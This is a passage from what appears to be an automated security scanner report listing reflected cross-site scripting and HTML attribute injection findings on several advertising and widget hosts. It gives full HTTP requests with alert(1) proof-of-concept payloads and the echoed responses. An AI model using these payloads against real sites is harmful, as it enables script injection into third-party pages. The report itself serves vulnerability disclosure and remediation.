GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f835585'%3balert(1)//18083999448&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:43 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5376
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f835585';alert(1)//18083999448" target="_blank">
...[SNIP]...

2.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec380'%3balert(1)//a42125f2184 was submitted in the mpvc parameter. This input was echoed as ec380';alert(1)//a42125f2184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3Dec380'%3balert(1)//a42125f2184 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:55 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=ec380';alert(1)//a42125f2184http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8" target="_blank">
...[SNIP]...

2.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3af"%3balert(1)//a5a21f89626 was submitted in the mpvc parameter. This input was echoed as 3f3af";alert(1)//a5a21f89626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D3f3af"%3balert(1)//a5a21f89626 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:53 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=3f3af";alert(1)//a5a21f89626");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3G
...[SNIP]...

2.37. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f80"%3balert(1)//26b30fe8258 was submitted in the mpck parameter. This input was echoed as 36f80";alert(1)//26b30fe8258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D451434730536f80"%3balert(1)//26b30fe8258&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:12 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6472
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=451434730536f80";alert(1)//26b30fe8258\" target=\"_blank\">
...[SNIP]...

2.38. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52687"%3balert(1)//9b5fe7461cc was submitted in the mpvc parameter. This input was echoed as 52687";alert(1)//9b5fe7461cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687"%3balert(1)//9b5fe7461cc HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:22 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6448
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687";alert(1)//9b5fe7461cchttp://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799
...[SNIP]...

2.39. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c991"%3balert(1)//9cb4a7a4bbe was submitted in the mpck parameter. This input was echoed as 5c991";alert(1)//9cb4a7a4bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D24376763225c991"%3balert(1)//9cb4a7a4bbe&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:10 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6461
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=24376763225c991";alert(1)//9cb4a7a4bbe\" target=\"_blank\">
...[SNIP]...

2.40. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e0f6"%3balert(1)//8131ab997d4 was submitted in the mpvc parameter. This input was echoed as 1e0f6";alert(1)//8131ab997d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6"%3balert(1)//8131ab997d4 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:20 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6437
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6";alert(1)//8131ab997d4http://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799
...[SNIP]...

2.41. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4d9f<script>alert(1)</script>7e1b748a12 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G08769b4d9f<script>alert(1)</script>7e1b748a12 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 07 Sep 2011 14:14:43 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 08 Sep 2011 14:14:43 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:42 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "G08769B4D9F<SCRIPT>ALERT(1)</SCRIPT>7E1B748A12" was not recognized.
*/

2.42. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe631"a%3d"b"7b2b26a4785 was submitted in the REST URL parameter 1. This input was echoed as fe631"a="b"7b2b26a4785 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesfe631"a%3d"b"7b2b26a4785/sprite-widget-17.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 65
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesfe631"a="b"7b2b26a4785/sprite-widget-17.png">
...[SNIP]...

2.43. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63eb5"a%3d"b"8301f8a2a40 was submitted in the REST URL parameter 2. This input was echoed as 63eb5"a="b"8301f8a2a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite-widget-17.png63eb5"a%3d"b"8301f8a2a40?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 286
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-17.png63eb5"a="b"8301f8a2a40">
...[SNIP]...

2.44. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d37ce"a%3d"b"69269d76801 was submitted in the REST URL parameter 1. This input was echoed as d37ce"a="b"69269d76801 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesd37ce"a%3d"b"69269d76801/sprite-widget-logos.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 62
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:01 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesd37ce"a="b"69269d76801/sprite-widget-logos.png">
...[SNIP]...

2.45. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a301"a%3d"b"aa15a3c938b was submitted in the REST URL parameter 2. This input was echoed as 8a301"a="b"aa15a3c938b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

